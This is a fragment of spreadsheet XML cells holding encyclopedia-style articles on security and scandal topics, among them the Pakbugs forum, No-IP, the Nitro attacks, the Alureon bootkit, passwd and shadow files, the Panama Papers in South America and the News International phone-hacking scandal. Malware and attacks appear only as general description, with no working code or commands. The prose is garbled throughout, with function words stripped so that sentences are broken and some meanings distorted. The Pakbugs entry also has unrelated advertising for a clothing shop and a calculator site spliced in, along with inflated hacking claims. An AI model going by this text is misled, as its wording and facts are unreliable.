malware-like behavior. secure search also advertised users free versions products. although add-on offers legitimate malware-blocking capabilities, default behavior changing internet browser's default search engine, homepage, page secure search reminiscent potentially unwanted program (pup), problems uninstalling add-on widely reported, add-on could potentially make internet browser vulnerable attacks. fixed problems browser extension. references external links official website</t>
  </si>
  <si>
    <t>Pakbugs</t>
  </si>
  <si>
    <t>pakbugs pakistani-based security forum offering security releases updates, discussion hacking, credit card fraud, phishing forms computer crime; well trading malware, bank login details stolen credit card numbers. forum shut multiple raids pakistani federal investigation agency members 2010, five individuals arrested, alleged founder suspected remain large riyadh.in addition crime forum, pakbugs also nomenclature group, used individuals numerous occasions claim responsibility attribution defacement several high-profile sites.also, forum offered resources courses pen-testing, programming subjects, beginner advanced. users registered learn programming, security, software engineering. forum back 2013 responsible hacking defacing entire pakistan's every website along google saint helana, google uganda, google morocco. this highly sophisticated group even hacked major pakistani banks besides indian middle eastern banks. further reading warner, gary july 2010). "pakbugs hackers arrested". cybercrime doing time. constantin, lucian september 2009). "online vigilante hacks carding-forum databaseonline vigilante hacks carding-forum database". softpedia.com. references korner.pk looking shopping printed lawn, export quality stuff korner.pk place find funky printed lawn export quality. must visit site enjoy beautiful colors life. thank daprofitclub many online tools calculations conversions, daprofitclub free easy online calculator conversion tool. must visit check website worth using tool must rate performance.</t>
  </si>
  <si>
    <t>AWStats</t>
  </si>
  <si>
    <t>awstats open source analytics reporting tool, suitable analyzing data internet services web, streaming media, mail, servers. awstats parses analyzes server files, producing html reports. data visually presented within reports tables graphs. static reports created command line interface, on-demand reporting supported browser program.awstats supports major server file formats including apache (ncsa combined/xlf/elf format common format (clf)), webstar, (w3c format), many common server formats. development moved sourceforge github 2014. cross-platform availability written perl, awstats deployed almost operating system. server-based website analysis tool, packages available linux distributions. awstats installed workstation, microsoft windows, local situations files downloaded remote server. licensing awstats licensed general public license (gpl). support proper analysis tool configuration report interpretation requires technical business knowledge. awstats support resources include documentation user community forums security considerations on-demand program object security exploits, case many programs. organizations wishing provide public access analytics reports consider generating static html reports. on-demand facility still used restricting internal users. precautions taken referrer spam. referrer spam filtering functionality added version 6.5. also list analytics software references external links official website</t>
  </si>
  <si>
    <t>No-IP</t>
  </si>
  <si>
    <t>no-ip (vitalwerks llc) domain host service provider. no-ip offers services, ddns, email, network monitoring certificates. email services include pop3, smtp, mail backup services, mail reflection filtering. history no-ip launched october 2000 offering free dynamic redirection. users able create sub-domain domains owned no-ip. 2000, vitalwerks internet solutions, formed parent company no-ip. january 2001 no-ip began offering paid managed services allowed users dynamic using domain name. later year, began offer email services. they began reselling domain names 2002 2006 became icann accredited registrar. no-ip subsequently featured macuser 2004 pcmag 2005. technology services no-ip provides dynamic services. basic provided free long user refreshes access time time, thus keeping active. upgrades ddns comes purchases. dynamic addresses common residential cable broadband accounts, typical users ddns would users types internet connections. service allows users create three hostnames no-ip domain. software clients provided windows, linux allows ddns connect oses. more often, however, routers used ddns configurations. most open-source firmware distributions, openwrt dd-wrt, include ddns downloadable packages, openwrt requires extra package no-ip specifically. microsoft legal action controversy june 2014, microsoft launched parte legal action no-ip, requesting microsoft given control no-ip's domain names. this granted without notifying no-ip june 2014, microsoft began redirecting domain traffic sinkhole. according no-ip affected malicious malicious users alike, despite microsoft's erroneous statement intent contrary. legitimate users service also diverted microsoft sinkhole. backlash confiscation however microsoft returning domains no-ip. also hosting service (see free dns) references external links official website microsoft appointed itself sheriff internet wired, robert mcmillan, october 2014</t>
  </si>
  <si>
    <t>Nitro hacking attacks</t>
  </si>
  <si>
    <t>nitro hacking attacks targeted malware campaign 2011 suspected case corporate espionage. least confirmed companies infected trojan called poison transferred intellectual property remote servers. much information known attacks comes white paper published cybersecurity company symantec (renamed nortonlifelock). targets initial attacks april 2011 targeted human rights organizations, though later focus shifted automotive companies. then july september another series breaches occurred majority targets chemical advanced materials industry defense sector. attacks international, targeted firms countries, though majority u.s., u.k., bangladesh. methods targets seem carefully selected researched, spear phishing emails usually going handful employees company claiming sent specific business partners contain security updates. these emails came attachment infected user's computer poison ivy, allowed attackers send remote commands eventually gain access valuable data. strange move, hackers actually used symantec's report activities means gain victims' trust. after paper published, emails sent nitro pretended symantec contained cursory information attack along attachment named "the_nitro_attackspdf.7z". this executable file would actually create real symantec white paper, would also infect machine remote access trojan. perpetrators unusually cybersecurity investigation, researchers able trace attacks back individual dubbed covert grove owned u.s.-based virtual private server involved campaign, though operated heibei province, china. claimed server logging instant messaging system investigators never able confirm direct involvement connection organization. however, symantec later attributed nitro group series attacks 2012 using java zero-day vulnerability called cve-2012-4681. also poisonivy (trojan) references external links symantec's white paper attacks (archived)</t>
  </si>
  <si>
    <t>Panama Papers (South America)</t>
  </si>
  <si>
    <t>panama papers 11.5 million leaked documents detail financial attorney-client information 214,488 offshore entities. documents, dating back 1970s, created taken from, panamanian firm corporate service provider mossack fonseca, leaked 2015 anonymous source.this page details related allegations, reactions, investigations, south america. argentina mauricio macri argentine president mauricio macri listed head trading company based bahamas disclose tenure mayor buenos aires; clear whether disclosure non-equity directorships required argentine law.on april 2016, federal prosecutor federico delgado began formal investigation macri's involvement fleg trading ltd., company registered panama president macri listed director. judge sebastián casanello asked start file inquiry. initial petition made neuquén representative darío martínez. martínez claims macri could guilty perjury omissions sworn statement. martínez also referenced another offshore company, kagemusha (named akira kurosawa's 1980 film), established 1981 president macri also connections. daniel muñoz daniel muñoz, private secretary confidant former argentinian president néstor kirchner later also served years aide néstor kirchner's wife, cristina fernández kirchner, president argentina 2007 2015. muñoz wife linked gold black limited, company incorporated british virgin islands 2010 invest real estate. origin company's funds listed "personal savings". from 2010 beginning 2015, company's ownership bearer shares, financial instrument used hide owner's identity. directors, sergio tadisco, told icij partner canal trece figurehead said agreed name used 2011 friendship muñoz wife. january 2015, muñoz wife became named shareholders, owning percent each. time, mossack fonseca become registered agent gold black. however, three weeks later, compliance department proposed resigning muñoz identified connection governments kirchners. resignation became effective june 2015.in 2009, muñoz investigated illicit enrichment, charge later dropped. 2013, argentinian media reported muñoz helped transfer "bags money" belonging president néstor kirchner buenos aires, argentine capital, santa cruz, kirchner's home state. charges matter dismissed july 2015 lack evidence. 2016, died cancer last four years. lionel messi family argentine barcelona football player lionel messi said would file complaint reports said mossack fonseca company 2012 named mega star enterprises inc. family denied messi involved called accusations slanderous. they said company referred panama papers inactive messi declared income image rights proceedings argentine agency. messi alongside father jorge stood trial three counts evasion 2016. spanish prosecutors tried evade €4.1m taxes income image rights assigning front companies belize uruguay. july 2016, messi father found guilty fraud handed suspended 21-month prison sentences, respectively ordered €1.7 million €1.4 million fines. brazil five billionaires brazil, sons brazilian billionaires, four former billionaire brazilian families appear panama papers leak, according forbes. brazilian news website access leaked documents published article list. like many panama paper reports, story cautions people mentioned documents nothing wrong: general nothing illegal offshore company fact common international business transactions joint ventures they're business world," said brazil-based marcello hallake, brazil-based partner firm jones day.however, members congress face criminal investigation another. high-profile construction executives senator among people arrested petrobras scandal, number reflects protections 1988 constitution judges prosecutors.three (marcel herrmann telles, carlos alberto sicupira jorge felipe lemann, long-time business partner jorge paulo lemann, brazil's richest controlling shareholder anheuser-busch inbev) three offshore companies british virgin islands bahamas tied private equity firm beer firm ambev, unit anheuser-busch inbev, according uol. companies longer active longer tied third. they told companies publicly disclosed registered. documents described lemann advisor brazilian firm carlos. father father's business partners controlling stake.the panama papers reveal former supreme court judge, joaquim barbosa, bought apartment downtown miami.police raided paulo offices mossack fonseca january 2016, seeking records offshore companies firm opened former executives petróleo brasileiro s.a. (petrobras) convicted 2015 corruption money laundering. police companies used hide illegally diverted funds. operation wash january 2016, even panama papers published, brazilian federal police, part corruption investigation known operation wash, already accused mossack fonseca's firm helping suspects create offshore entities hide corrupt money. they alleged firm used real estate company help hide criminal proceeds scheme involving petrobras. impeachment leak complicated already volatile political situation brazil, tanking economy calls impeachment president dilma rousseff amid many revelations political corruption. impeachment proceedings began, became clear next people order succession implicated petrobras scandal. according estado paulo, company belonging eduardo cunha, speaker lower house legislature leader impeachment drive, surfaced panama papers. rousseff mentioned papers.politicians seven different political parties brazil named clients mossack fonseca. leaked files mention politicians brazil's largest party, pmdb, broke away president dilma rousseff's coalition 2016. political figures psdb, prominent opposition party country, also mentioned leaks, well others pdt, psb, parties. politicians rousseff's party mentioned leaks. fifa bribes group dutch journalists daily newspaper trouw found evidence panama papers showing globo cited "many times" money laundering investigation nederlandsche bank revealed years media outlet conducted "irregular financial transactions" havens order broadcast rights copa libertadores. chile head chilean branch transparency international, campaigns corporate secrecy, resigned name linked five firms havens leaked documents. colombia national directorate taxes customs launched investigation clients mossack fonseca colombia, subsidiary mossack fonseca established 2009. 2014, colombia placed panama onto blacklist havens. leaked documents also panama move forward ongoing negotiations colombia information-sharing. ecuador ecuadorian journalists published names three current government officials, panama papers also reveal 2012 panamanian government believed mossack fonseca company anti-corruption prosecutor investigating embezzlement, orlion s.a., sold president rafael correa delgado brother fabricio correa 2006. mossack fonseca asked shareholder information contacted legalsa asociados, firm guayaquil, ecuador offshore client. shortly afterwards firm dropped offshore lack information.correa's cousin, pedro delgado campana, convicted absentia ecuador embezzlement, bought home north miami beach mossack fonseca company wife, consul ecuador miami time.arturo torres, investigative editor comercio, told knight center newspaper published stories connected panama papers: grupo ortega trujillo offshore companies panama chinese company, government contracts ties companies operate havenshe rest journalists ecuador report received summonses subpoenas little-known anticorruption agency council citizen participation social control (cpccs), demanding documents. scheduled hearing postponed earthquake april national assembly's commission justice also opened investigation.mónica almeida universo said government taken coverage panama papers attack itself. stories ecuadorian media mentioned attorney general galo chiriboga; pedro delgado campaña, former president central bank ecuador correa' cousin; javier molina, former adviser ministry intelligence founders mossack fonseca quito. peru supporters leading candidate keiko fujimori undeclared interests mossack fonseca companies, according icij partner ojopúblico, said well three renowned chefs peru's largest timber company also implicated.mario vargas llosa, also spanish nationality, wife bought offshore company buffer mossack fonseca. couple appears linked september 2010, october year, shortly vargas llosa nobel prize literature. after appearing linked, denied using havens. uruguay five people arrested april suspicion laundering funds mexican drug cartel. uruguayan investigation underway, authorities decided move reports icij partner, weekly búsqueda, gerardo gonzález valencia used mossack fonseca companies real estate uruguay. head cuinos cartel, brother abigael gonzález valencia, imprisoned mexico united states designated drug kingpin, well brother-in-law nemesio oseguera cervantes, leads jalisco generation cartel (cjng). venezuela many boliburguesía, individuals became wealthy hugo chávez nicolás maduro administrations included scandal.josmel velásquez, brother security official late hugo chávez, arrested april trying catch flight country offshore company revealed panama papers. mother amelis figueroa also arrested, allowed return home health. venezuelan news site armando.info reported josmel's brother adrian, former aide late president hugo chávez, opened shell company though mossack fonseca republic seychelles $50,000 deposit. their report based documents leaked panamanian firm mossack fonseca. velásquez indicted april 20.franklin durán, notorious venezuela argentina part maletinazo, "suitcase scandal" involving alleged illicit contribution venezuelan president hugo chavez christina fernandez kirchner $800,000 venezuelan state-run company, pdvsa, able open shell company jail cell united states, serving sentence operating unregistered foreign agent. references further reading bastian obermayer; frederik obermaier (2016). panama papers: breaking story rich powerful hide their money. isbn 978-1786070470. external links manifest panama papers leaker panama papers portal international consortium investigative journalists (us) panama papers portal süddeutsche zeitung (germany) panama papers portal guardian (united kingdom) panama papers portal financial times (united kingdom) panama papers portal monde (france) panama papers portal sveriges television (sweden) portal african network centers investigative reporting (ancir) (africa) panama papers portal archived june 2016, wayback machine inkyfada (tunisia) panama papers portal semanario universidad university costa rica panama papers portal organized crime corruption reporting project panama papers portal desk (morocco) panama papers portal reykjavík media (iceland) panama papers portal armando.info (venezuela) zealand ir607:foreign trust disclosure</t>
  </si>
  <si>
    <t>Alureon</t>
  </si>
  <si>
    <t>alureon (also known tdss tdl-4) trojan bootkit created steal data intercepting system's network traffic searching banking usernames passwords, credit card data, paypal information, social security numbers, sensitive user data. following series customer complaints, microsoft determined alureon caused wave bsods 32-bit microsoft windows systems. update, ms10-015, triggered crashes breaking assumptions made malware author(s).according research conducted microsoft, alureon second active botnet second quarter 2010. description alureon bootkit first identified around 2007. personal computers usually infected users manually download install trojan software. alureon known bundled rogue security software, "security essentials 2010". when dropper executed, first hijacks print spooler service (spoolsv.exe) update master boot record execute modified bootstrap routine. then infects low-level system drivers responsible pata operations (atapi.sys) install rootkit. once installed, alureon manipulates windows registry block access windows task manager, windows update, desktop. also attempts disable anti-virus software. alureon also known redirect search engines commit click fraud. google taken steps mitigate users scanning malicious activity warning users case positive detection.the malware drew considerable public attention software code caused 32-bit windows systems crash upon installation security update ms10-015. malware using hard-coded memory address kernel changed installation hotfix. microsoft subsequently modified hotfix prevent installation alureon infection present, malware author(s) also fixed code. november 2010, press reported rootkit evolved point bypassing mandatory kernel-mode driver signing requirement 64-bit editions windows subverting master boot record, made particularly resistant systems detection removal anti-virus software. tdl-4 tdl-4 sometimes used synonymously alureon also name rootkit runs botnet. first appeared 2008 tdl-1 detected kaspersky april 2008. later version appeared known tdl-2 early 2009. some time tdl-2 became known, emerged version three titled tdl-3. this eventually tdl-4.it often noted journalists "indestructible" 2011, although removable tools kaspersky's tdsskiller. infects master boot record target machine, making harder detect remove. major advancements include encrypting communications, decentralized controls using network, well deleting malware. removal while rootkit generally able avoid detection, circumstantial evidence infection found examination network traffic packet analyzer inspection outbound connections tool netstat. although existing security software computer occasionally report rootkit, often goes undetected. useful perform offline scan infected system booting alternative operating system, winpe, malware attempt prevent security software updating. "fixmbr" command windows recovery console manual replacement "atapi.sys" could possibly required disable rootkit functionality anti-virus tools able find clean infection.various companies created standalone tools attempt remove alureon. popular tools microsoft windows defender offline kaspersky tdsskiller. arrests november 2011, united states attorney southern district york announced charges estonian nationals arrested estonian authorities russian national, conjunction operation ghost click. february 2012, individuals extradited york running sophisticated operation used alureon infect millions computers. also bagle (computer worm) botnet conficker gameover zeus regin (malware) rustock botnet srizbi botnet storm botnet trojan.win32.dnschanger zeroaccess botnet zeus (malware) zombie (computing) references external links tdsskiller tool detecting removing rootkits bootkits, kaspersky tdss removal, june 2011, trishtech.com virus:win32/alureon.a microsoft security intelligence backdoor.tidserv symantec</t>
  </si>
  <si>
    <t>Nickel (hacker group)</t>
  </si>
  <si>
    <t>nickel china based hacking group reportedly backed chinese government primarily targets government organisations. references</t>
  </si>
  <si>
    <t>Passwd</t>
  </si>
  <si>
    <t>passwd command unix, plan inferno, unix-like operating systems used change user's password. password entered user derivation function create hashed version password, saved. only hashed version stored; entered password saved security reasons. when user logs password entered user process derivation function resulting hashed version compared saved version. hashes identical, entered password considered correct, user authenticated. theory, possible different passwords produce hash. however, cryptographic hash functions designed finding password produces hash difficult practically infeasible, produced hash matches stored one, user authenticated. passwd command used change passwords local accounts, systems, also used change passwords managed distributed authentication mechanism nis, kerberos, ldap. password file /etc/passwd file text-based database information users system operating system user identities running processes. many operating systems file many possible back-ends general passwd name service. file's name originates initial functions contained data used verify passwords user accounts. however, modern unix systems security-sensitive password information instead often stored different file using shadow passwords, database implementations. /etc/passwd file typically file system permissions allow readable users system (world-readable), although modified superuser using special purpose privileged commands. /etc/passwd file text file record line, describing user account. each record consists seven fields separated colons. ordering records within file generally unimportant. example record fields, order left right, are: jsmith: user name: string user would type logging operating system: logname. must unique across users listed file. information used validate user's password. format analogous field shadow password file, additional convention setting means actual password found shadow file, common occurrence modern systems. 1001: user identifier number, used operating system internal purposes. need unique. 1000: group identifier number, identifies primary group user; files created user initially accessible group. smith,room 1007...: gecos field, commentary describes person account. typically, comma-separated values including user's full name contact details./home/jsmith: path user's home directory. /bin/sh: program started every time user logs system. interactive user, usually system's command line interpreters (shells). shadow file /etc/shadow used increase security level passwords restricting highly privileged users' access hashed password data. typically, data kept files owned accessible super user. systems administrators reduce likelihood brute-force attacks making list hashed passwords unreadable unprivileged users. obvious make passwd database readable root user. however, would restrict access data file username-to-userid mappings, would break many existing utilities provisions. solution "shadow" password file hold password hashes separate data world-readable passwd file. local files, usually /etc/shadow linux unix systems, /etc/master.passwd systems; readable root. (root access data considered acceptable since systems traditional "all-powerful root" security model, root user would able obtain information ways case). virtually recent unix-like operating systems shadowed passwords. shadow password file entirely solve problem attacker access hashed passwords, network authentication schemes operate transmitting hashed password network (sometimes cleartext, e.g., telnet), making vulnerable interception. copies system data, system backups written tape optical media, also become means illicitly obtaining hashed passwords. addition, functions used legitimate password-checking programs need written malicious programs cannot make large numbers authentication checks high rates speed. regardless whether password shadowing effect given system, passwd file readable users various system utilities (e.g., grep) work (e.g., ensure user names existing system found inside file), root user write without password shadowing, means attacker unprivileged access system obtain hashed form every user's password. those values used mount brute force attack offline, testing possible passwords hashed passwords relatively quickly without alerting system security arrangements designed detect abnormal number failed login attempts. especially hash salted also possible look hashed passwords rainbow tables, databases specially made giving back password unique hash. with shadowed password scheme use, /etc/passwd file typically shows character '*', password field user instead hashed password, /etc/shadow usually contains following user information: user login name salt hashed password status exception value e.g.: $id$salt$hashed, printable form password hash produced crypt (c), algorithm used. other unix-like systems different values, like netbsd. stretching used increase password cracking difficulty, using default 1000 rounds modified md5, rounds blowfish, 5000 rounds sha-256 sha-512. number rounds varied blowfish, sha-256 sha-512 using $a$rounds=x$, algorithm number rounds. common values include:$1$ $2$, $2a$, $2b$ bcrypt sha-256 sha-512 yescrypt empty string password, account password (reported passwd solaris "np"). "!", account password locked, user unable password authentication methods (e.g. key, logging root) still allowed. "*lk*" account locked, user unable "*np*", "!!" password never days since epoch last password change days change allowed days change required days warning expiration days logins account locked days since epoch account expires reserved unusedthe format shadow file simple, basically identical password file, wit, line user, ordered fields line, fields separated colons. many systems require order user lines shadow file identical order corresponding users password file. history prior password shadowing, unix user's hashed password stored second field record /etc/passwd file (within seven-field format outlined above). password shadowing first appeared unix systems development sunos mid-1980s, system release 1988 bsd4.3 reno 1990. but, vendors performed ports earlier unix releases always include password shadowing features releases, leaving users systems exposed password file attacks. system administrators also arrange storage passwords distributed databases ldap, rather files connected system. case nis, shadow password mechanism often still used servers; distributed mechanisms problem access various user authentication components handled security mechanisms underlying data repository. 1987, author original shadow password suite, julie haugh, experienced computer break-in wrote initial release shadow suite containing login, passwd commands. original release, written xenix operating system, quickly ported platforms. shadow suite ported linux 1992 year original announcement linux project, included many early distributions, continues included many current linux distributions. past, necessary different commands change passwords different authentication schemes. example, command change password yppasswd. this required users aware different methods change passwords different systems, also resulted wasteful duplication code various programs performed functions different back ends. implementations, single passwd command, control password actually changed handled transparently user pluggable authentication modules (pams). example, type hash used dictated configuration pam_unix.so module. default, hash used, current modules also capable stronger hashes blowfish, sha256 sha512. also chsh crypt (the library function) crypt (unix) (the utility) getent security account manager (the microsoft windows equivalent password file) unix security vipw references external links manual page unix first edition describing /etc/passwd passwd(1): update user's authentication token(s) freebsd general commands manual passwd(1) plan programmer's manual, volume passwd(1) inferno general commands manual authconfig, command-line tool controlling shadow passwords</t>
  </si>
  <si>
    <t>AOL Active Virus Shield</t>
  </si>
  <si>
    <t>active virus shield (commonly referred avs) free antivirus utility made available aol. engine based used kaspersky anti-virus. program longer available. features active virus shield includes numerous features found kaspersky anti-virus. software's main feature malware scanning, uses kaspersky's underlying engine detects variety malware viruses, spyware, even joke programs. also offers real-time file e-mail scanning protection. latest version active virus shield (version 6.0.2.621) supports windows vista. advantages active virus shield light compared commercial anti-virus products. also consume much memory startup. program also benefits kaspersky's regular definition updates, typically around every hours, enable viruses effectively detected programs update less regularly. addition, active virus shield better detection rates free programs free avast! home edition. criticisms active virus shield lack features kaspersky (such proactive protection http protection), license provided valid year, although email address used initially easily used renew times. also support mail scanning using ssl. some users also reported compatibility problems certain applications mcafee personal firewall plus, zonealarm logitech products. current status active virus shield longer available download august 2007. replaced mcafee virus scan plus special edition aol, available free users free account. even though active virus shield longer available officially, latest version program still obtained mirror server hosted help also still offered already using application. also antivirus software kaspersky references notesaol active virus shield external links active virus shield homepage (defunct) active virus shield mirrorpage (functional)</t>
  </si>
  <si>
    <t>NewLove</t>
  </si>
  <si>
    <t>newlove computer virus infects microsoft windows microsoft windows 2000, windows users also running internet explorer 5.0. virus spreads e-mail takes name recently accessed file user's computer uses name. newlove targets every single file user's hard drive computer stops working. virus causes damage iloveyou sneaks around virus scanners. 2000, many media outlets updated americans virus, virus cause much damage people expected. references</t>
  </si>
  <si>
    <t>News International phone hacking scandal</t>
  </si>
  <si>
    <t>news international phone hacking scandal controversy involving now-defunct news world british newspapers owned rupert murdoch. employees newspaper accused engaging phone hacking, police bribery, exercising improper influence pursuit stories. whilst investigations conducted 2005 2007 appeared show paper's phone hacking activities limited celebrities, politicians, members british royal family, july 2011 revealed phones murdered schoolgirl milly dowler, relatives deceased british soldiers, victims july 2005 london bombings also hacked. resulting public outcry news corporation owner rupert murdoch several high-profile resignations, including murdoch news corporation director, murdoch's james executive chairman, jones chief executive hinton, news international legal manager crone, chief executive rebekah brooks. commissioner london's metropolitan police service (mps), paul stephenson, also resigned. advertiser boycotts closure news world july 2011, years publication. public pressure forced news corporation cancel proposed takeover british satellite broadcaster bskyb. prime minister david cameron announced july 2011 public inquiry, known leveson inquiry, would look phone hacking police bribery news world, consider wider culture ethics british newspaper industry press complaints commission would replaced "entirely". number arrests convictions followed, notably former news world managing editor andy coulson. murdoch son, james, summoned give evidence leveson inquiry. over course testimony, rupert murdoch admitted cover-up taken place within news world hide scope phone hacking. 2012, parliamentary select committee report concluded murdoch "exhibited wilful blindness going companies publications" stated "not person exercise stewardship major international company". july 2013, channel news broadcast secret tape murdoch dismissively claims investigators "totally incompetent" acted "next nothing" excuses papers' actions "part culture fleet street". early investigations, 1990s–2005 2002, organised trade confidential personal information developed britain widely used british newspaper industry. illegal means gaining information used included hacking private voicemail accounts mobile phones, hacking computers, making false statements officials, entrapment, blackmail, burglaries, theft mobile phones making payments public officials. operation nigeria private investigators illegally providing information news world also engaged variety illegal activities. between 1999 2003, several convicted crimes including drug distribution, theft drugs, child pornography, planting evidence, corruption, perverting course justice. jonathan rees partner fillery, former police officer, also suspicion murder private investigator daniel morgan. undertook investigation rees, entitled operation nigeria, tapped telephone. substantial evidence accumulated rees purchasing information improper sources that, amongst others, alex marunchak news world paying £150,000 year jonathan rees reportedly bought information former serving police officers, customs officers, inspector, bank employees, burglars, blaggers would telephone inland revenue, dvla, banks phone companies, deceive releasing confidential information. rees sold information news world, daily mirror, sunday mirror sunday times.the operation nigeria bugging ended september 1999 rees arrested heard planning plant drugs woman husband could custody child. rees convicted 2000 served five-year prison sentence. other individuals associated rees taped operation nigeria, including detective constable austin warnes, former detective duncan hanrahan, former detective constable martin king former detective constable kingston, prosecuted jailed various offences unrelated phone hacking.in june 2002, fillery reportedly used relationship alex marunchak arrange private investigator glenn mulcaire, work news world, obtain confidential information detective chief superintendent david cook, police officers investigating murder daniel morgan. mulcaire obtained cook's home address, internal metropolitan police payroll number, date birth figures mortgage payments well physically following family. attempts access cook's voicemail wife, possibly hack computer intercept post also suspected. documents reportedly held scotland yard show "mulcaire instructions greg miskiw, assistant editor news world close friend marunchak." metropolitan police service handled apparent attempt agents news world interfere murder inquiry informal discussions rebekah brooks, editor newspaper. "scotland yard took action, apparently reflecting desire dick fedorcio, director public affairs internal communication close working relationship brooks, avoid unnecessary friction newspaper."no charged illegal acquisition confidential information result operation nigeria, even though reportedly collected hundreds thousands incriminating documents investigation jonathan rees links corrupt officers. fillery convicted child pornography offences 2003. upon rees' release prison 2005, immediately resumed investigative work news world, andy coulson succeeded rebekah brooks editor. operation motorman 2002, title operation motorman, information commissioner's office raided offices various newspapers private investigators, looking details personal information kept unregistered computer databases. operation uncovered numerous invoices addressed newspapers magazines, detailed prices provision personal information. total journalists, working least publications, identified purchasing confidential information private investigators. raided private investigator named john boyall, whose specialty acquiring information confidential databases. glenn mulcaire boyall's assistant, autumn 2001 news world's assistant editor, greg miskiw gave full-time contract work newspaper. when raided boyall's premises november 2002 seized documents premises another private investigator, steve whittamore. there found "more 13,000 requests confidential information newspapers magazines." this established confidential information illegally acquired telephone companies, driver vehicle licensing agency police national computer. "media, especially newspapers, insurance companies local authorities chasing council arrears appear sales ledger" agency. whittamore's network gave access confidential records telephone companies, banks, post offices, hotels, theatres, prisons, including group, crédit lyonnais, goldman sachs, hang seng bank, glen parva prison, stocken prison.although issued reports, "what price privacy?" 2006 "what price privacy now?" december 2006, much information obtained operation motorman made public. although evidence many people engaged illegal activity, relatively questioned. operation motorman's lead investigator said 2006 "his team told interview journalists involved. investigator...accused authorities 'frightened' tackle journalists." newspaper highest number requests daily mail transactions journalists; news world came fifth table, transactions journalists. daily mail rejected accusations within report insisting used private investigators confirm public information, dates birth. operation glade learning steve whittamore obtaining information police national computer, information commissioner contacted metropolitan police met's anti-corruption unit initiated operation glade. whittamore's detailed records identified different journalists commissioned acquire confidential information paid tens thousands pounds. invoices submitted news international "sometimes made explicit reference obtaining target's details phone number vehicle registration." between february 2004 april 2005, crown prosecution service charged working private detective agencies crimes relating illegal acquisition confidential information. journalists charged. whittamore, boyall, others pleaded guilty april 2005. according head richard thomas, "each pleaded guilty yet, despite extent frequency admitted criminality, conditionally discharged [for years], raising important questions public policy." 2005–2006: royal phone hacking scandal november 2005, news world published article written royal editor clive goodman, claiming prince william process borrowing portable editing suite correspondent bradby. following publication, prince bradby figure details arrangement leaked, people aware prince william noted another equally improbable leak recently taken place regarding appointment made knee surgeon. prince bradby concluded likely voicemails accessed.the metropolitan police investigation deputy assistant commissioner peter clarke reporting assistant commissioner andy hayman, commander specialist operations directorate, included royal protection. january 2006 clarke's team concluded compromised voice mail accounts belonged prince william's aides, prince himself, "unambiguous trail" clive goodman, news world royal reporter, glenn mulcaire, private investigator. detectives goodman mulcaire surveillance and, august 2006, searched goodman's desk news world raided mulcaire's home. there seized "11,000 pages handwritten notes listing nearly 4,000 celebrities, politicians, sports stars, police officials crime victims whose phones hacked." names included eight members royal family staff. there dozens notebooks, computers containing 2,978 complete partial mobile phone numbers codes, plus tape recordings made mulcaire. significantly, least three names news world journalists goodman recording mulcaire instructing journalist hack private voice mail. material taken scotland yard. august 2006, goodman mulcaire arrested metropolitan police, later charged hacking telephones members royal family accessing voicemail messages, offence section regulation investigatory powers 2000. news world paid mulcaire £104,988 services. addition, goodman paid mulcaire £12,300 cash november 2005 august 2006, using code name alexander expenses sheet him. court heard mulcaire also hacked messages supermodel elle macpherson, former publicist clifford, simon hughes, football agent andrew, gordon taylor. january 2007, goodman mulcaire pleaded guilty charges sentenced four months imprisonment respectively. day, andy coulson resigned editor news world, insisting knowledge illegal activities. march 2007, senior aide rupert murdoch told parliamentary committee "rigorous internal investigation" found evidence widespread hacking news world. after goodman mulcaire pleaded guilty, breach privacy claim started gordon taylor, chief executive professional footballers association represented solicitor mark lewis. that claim settled payment £700,000 including legal costs. james murdoch agreed settlement. investigations press complaints commission, pcc, organisation charged self-regulation newspaper magazine industry britain. pcc's inquiry phone hacking 2007 concluded practice stop "there legitimate place subterfuge grounds public interest possible obtain information means." news world editor colin myler told goodman's hacking "aberrational", rogue exception" single journalist. opted question andy coulson grounds left industry, question journalist executive paper, apart myler, knowledge going appointment. pcc's subsequent report failed uncover evidence phone hacking newspaper beyond revealed goodman's trial.in 2009 held another inquiry, whether misled news world 2007, evidence phone hacking taken place since then. concluded misled evidence ongoing phone hacking. this report conclusions withdrawn july 2011, days revealed milly dowler's phone hacked. 2009–2011: renewed investigations after 2006 conviction clive goodman glenn mulcaire, assurances news international, press complaints commission metropolitan police service else involved phone hacking, public perception matter closed. nick davies journalists guardian, eventually newspapers, however continued examine evidence court cases freedom information 2000 requests find evidence contrary. guardian july 2009 reports small number victims phone hacking engaged solicitors made civil claims invasion privacy. march 2010, news international spent million settling court cases victims phone hacking. information claims leaked out, guardian continued follow story. july 2009, newspaper published three articles alleging that: news group newspapers, ngn, subsidiary news international, agreed large settlements hacking victims, including gordon taylor. settlements included gagging provisions prevent release evidence journalists used criminal methods stories. "news group persuaded court seal file taylor's case prevent public access, even though contained prima facie evidence criminal activity." that evidence included documents seized raids information commissioner's office well met. suppressed evidence became public, hundreds phone hacking victims might able take legal action news international newspapers might lead police inquiries re-opened. when andy coulson editor news world, journalists openly engaged private investigators illegal phone hacking raised invoices itemised illegal acts. everybody news world knew going knew public interest defense phone hacking. investigations pursued raised serious questions metropolitan police, crown prosecution service, courts which, "faced evidence conspiracy systemic illegal actions,... agreed seal evidence." rather make public. held evidence thousands mobile phones hacked agents news world members parliament, including cabinet ministers, among victims. "the metropolitan police took decision inform individuals whose phones targeted crown prosecution service decided take news group executives court." news international executives misled parliamentary select committee, press complaints commission public extent newspaper's illegal activities. scotland yard's response when guardian articles published, metropolitan police service commissioner paul stephenson asked assistant commissioner john yates look phone hacking case reopened. yates reportedly took eight hours consult senior detectives crown prosecution lawyers conclude fresh material could lead convictions. review include examination thousands pages evidence seized 2006 mulcaire raid. september 2009, yates maintained position commons culture, media sport committee saying, "there remain insufficient grounds evidence arrest interview anyone else and... additional evidence come light." upon review first inquiry, concluded "hundreds, thousands potential victims." yates told committee, few, handful" persons subject hacking. although yates aware "transcript neville" email indicated single rogue reporter involved, interview neville thurlbeck journalist news world, look cases victims beyond eight named court 2006. committee's findings, released february 2010, critical police pursuing "evidence merited wider investigation."the committee chairman john whittingdale also questioned whether committee misled several news international executives testified 2007 goodman alone involved phone hacking. committee heard evidence hinton, chief executive officer jones company, andy coulson, director communications conservative party. their report concluded "inconceivable" one, goodman, knew extent phone hacking paper, committee "repeatedly encountered unwillingness provide detailed information sought, claims ignorance lack recall deliberate obfuscation".assistant commissioner yates returned committee march 2011 defended position twelve victims criteria given police crown prosecution service. denied told could reasonably used limit scope investigation. further, claimed misled consultations royal household inquiry. officials reportedly "didn’t discuss certain evidence senior prosecutors, including notes suggesting involvement reporters."the home affairs select committee also questioned yates 2009 met's continuing refusal reopen investigation "following allegations news international reporters commissioned private investigators carry tasks, might illegal." yates responded looked facts original 